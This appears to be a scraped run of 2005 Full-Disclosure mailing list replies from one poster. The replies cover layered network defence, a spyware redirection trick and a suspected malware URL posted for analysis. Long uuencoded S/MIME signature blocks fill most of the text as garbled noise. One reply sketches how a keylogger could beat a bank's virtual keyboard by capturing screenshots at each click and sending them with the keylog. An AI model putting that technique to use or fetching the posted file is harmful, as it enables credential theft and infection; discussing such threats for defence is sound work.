MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E
M(%!EG-O;F%L($9R965M86EL($ESW5I;F@0T$`P]$# )[EMAIL PROTECTED]@,@4`
MH(((S [EMAIL PROTECTED]]PT!0,QP8)*H9(AO-`0!,!P2J2(;W#0$)!3$/
M%PTP-3 X,3 P,S(U,C5:,,2J2(;W#0$)!#$6!!14%]NPOUI/D.Z9]\3
[EMAIL PROTECTED]]PT!1 `3%6,%0$'0`0L8N('B5ND:A
[EMAIL PROTECTED]:T*0$`@ $`,# P+H$L861I='EA+F1EVAM=6MH0]N;EN92YG
M871E=V%Y+G-TF%N9VQE9YN970P9P8)*H9(AO-`0D/,5HP6# *!@@JADB
M]PT#!S .!@@JADB]PT#`@(`( P#08(*H9(AO-`P(`4 P!P8%*PX#`@P
M#08(*H9(AO-`P([EMAIL PROTECTED]@8(*H9(AO[EMAIL PROTECTED] 8)*P8!!
M-Q $,6LP:3!B,0LP08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U
M;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R
M965M86EL($ESW5I;F@0T$`P]$[EMAIL PROTECTED]]PT!1 S%KHDP8C$+
M, D`U4$!A,6D$Q)3 [EMAIL PROTECTED] H3'%1H87=T92!#;VYS=6QT:6YG(A0='DI
M($QT9XQ+# [EMAIL PROTECTED] ,3(U1H87=T92!097)S;VYA;!F5E;6%I;!)W-U
M:6YG($-!`@,/1 @P#08)*H9(AO-`0$!!0`$@@$`HJ^ / L]GFS3!S?((\K
M-PTB:79V5#_%_A+%J:3`B#N^^BT4G.@;?XJI67Y56:-3IM2T.=I\2$?
RE: [Full-disclosure] perfect security architecture (network)
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of C0BR4
Sent: Monday, August 08, 2005 11:05 AM
To: [EMAIL PROTECTED]
Subject: [Full-disclosure] perfect security architecture (network)
How should we deal with these attacks? People talk about
Firewall, IDS/IPS etc..
What's best?
You can have all - specially security in layers is the best And it
is best that you use all
Have a restrictive firewall at the perimeter
Separate the web exposed servers and applications in DMZ
Anti-virus is mostly reactive use that but don't *rely* on it
If asked to give a perfect security architecture (network) what would
you suggest? Given
a Firewall, Router, IDS, IPS and Anti-virus .
Firewall - openbsd with pf or Selinux with ipchains / iptables
- ( don't know the exact name ) but I am using pf
Router - if you are running a low throughput net you can use
Another Linux / bsd box to do this stuff also
IDS - snort with proper configuration and fine-tuning - this takes
Some time but once done this is rock solid
IPS - same as above - snort
Antivirus- Clamav
Snort and Clamav also run on windows if you are not running UNIX and
there are manuals about this on the net
What system are you trying to design ?
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E
RE: [Full-disclosure] Re: Re: Re: Re: Re: Re: Re: Re: Re: Re:Re:[Full-dicklosure] Weird URL
No that wouldn't happen. You'd need to spell it correctly. ;-}
And this has been used by some malious site some time in the recent past
Something along the lines of [somedomain].com.net and when .com went offline
Everyone was directed to .com.net and got infected with spyware so it
better to turn off this smart redirection
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E
M(%!EG-O;F%L($9R965M86EL($ESW5I;F@0T$`P]$# )[EMAIL PROTECTED]@,@4`
MH(((S [EMAIL PROTECTED]]PT!0,QP8)*H9(AO-`0!,!P2J2(;W#0$)!3$/
M%PTP-3 X,#DP,3$Q,3E:,,2J2(;W#0$)!#$6!!2P8/[34S0UZ?\YHL
[EMAIL PROTECTED]]PT!1 `3%6,%0$'0`0H8]A%+;STJ(
M`WQF!PF [EMAIL PROTECTED]@ $`,# P+H$L861I='EA+F1EVAM=6MH0]N;EN92YG
M871E=V%Y+G-TF%N9VQE9YN970P9P8)*H9(AO-`0D/,5HP6# *!@@JADB
M]PT#!S .!@@JADB]PT#`@(`( P#08(*H9(AO-`P(`4 P!P8%*PX#`@P
M#08(*H9(AO-`P([EMAIL PROTECTED]@8(*H9(AO[EMAIL PROTECTED] 8)*P8!!
M-Q $,6LP:3!B,0LP08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U
M;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R
M965M86EL($ESW5I;F@0T$`P]$[EMAIL PROTECTED]]PT!1 S%KHDP8C$+
M, D`U4$!A,6D$Q)3 [EMAIL PROTECTED] H3'%1H87=T92!#;VYS=6QT:6YG(A0='DI
M($QT9XQ+# [EMAIL PROTECTED] ,3(U1H87=T92!097)S;VYA;!F5E;6%I;!)W-U
M:6YG($-!`@,/1 @P#08)*H9(AO-`0$!!0`$@@$`K#J#ML%1V9-Q%;7XYB.
M#$ 6TI%B_TR'/^C:([EMAIL PROTECTED]G;[EMAIL PROTECTED] =M^CH
RE: [Full-disclosure] What is this
http://www.pokersverige.se/IMAGE0004.php
.exe file of some kind using only the headers will
have to download it and test in some vmware machine to
debug it - anyone volunteer for that task ?
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E
M(%!EG-O;F%L($9R965M86EL($ESW5I;F@0T$`P]$# )[EMAIL PROTECTED]@,@4`
MH(((S [EMAIL PROTECTED]]PT!0,QP8)*H9(AO-`0!,!P2J2(;W#0$)!3$/
M%PTP-3 X,#DP,3$W,31:,,2J2(;W#0$)!#$6!!3U+3-A/GY3$S0`VG6#
MUB=_HONU[EMAIL PROTECTED]]PT!1 `3%6,%0$'0`0[EMAIL PROTECTED]I
MIR2XE:?\7P$`@ $`,# P+H$L861I='EA+F1EVAM=6MH0]N;EN92YG
M871E=V%Y+G-TF%N9VQE9YN970P9P8)*H9(AO-`0D/,5HP6# *!@@JADB
M]PT#!S .!@@JADB]PT#`@(`( P#08(*H9(AO-`P(`4 P!P8%*PX#`@P
M#08(*H9(AO-`P([EMAIL PROTECTED]@8(*H9(AO[EMAIL PROTECTED] 8)*P8!!
M-Q $,6LP:3!B,0LP08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U
M;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R
M965M86EL($ESW5I;F@0T$`P]$[EMAIL PROTECTED]]PT!1 S%KHDP8C$+
M, D`U4$!A,6D$Q)3 [EMAIL PROTECTED] H3'%1H87=T92!#;VYS=6QT:6YG(A0='DI
M($QT9XQ+# [EMAIL PROTECTED] ,3(U1H87=T92!097)S;VYA;!F5E;6%I;!)W-U
M:6YG($-!`@,/1 @P#08)*H9(AO-`0$!!0`$@@$`G@,#7]'D43YJTX5ZC'4G
MV54\MT5[6:3KD,1!!U-.CW.4!DG33E\Y/DNO0-F!:)S$@;T70NAD;0[_6
MHN85I2YI*[BOQ#JB8RT4HE,3\!Z)3*3^3J5K8/[DKZG\1!N48FN^#0=)=L
ME0`WF[T39=#!0;13ND0L9O.NNQKO[U2W*.1HTVE/0Z+H_=T/-!X7TF?B[X
M`WT7FHP\*]_OK4
RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection
proximity of mouse cursor on every mouse click? It's not that resource consuming, and easy to arrange. You'd need to squeeze in some OCR code as well, or figure it out manually (or maybe use the same techniques as for getting around captchas). Another simple method capture the screen shot and send the picture along the keylog I think you would get a lot of commercial keyloggers that already have this capability and use the screen dumps for offline analysis This sure gets around most of the obstacles. -aditya Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: 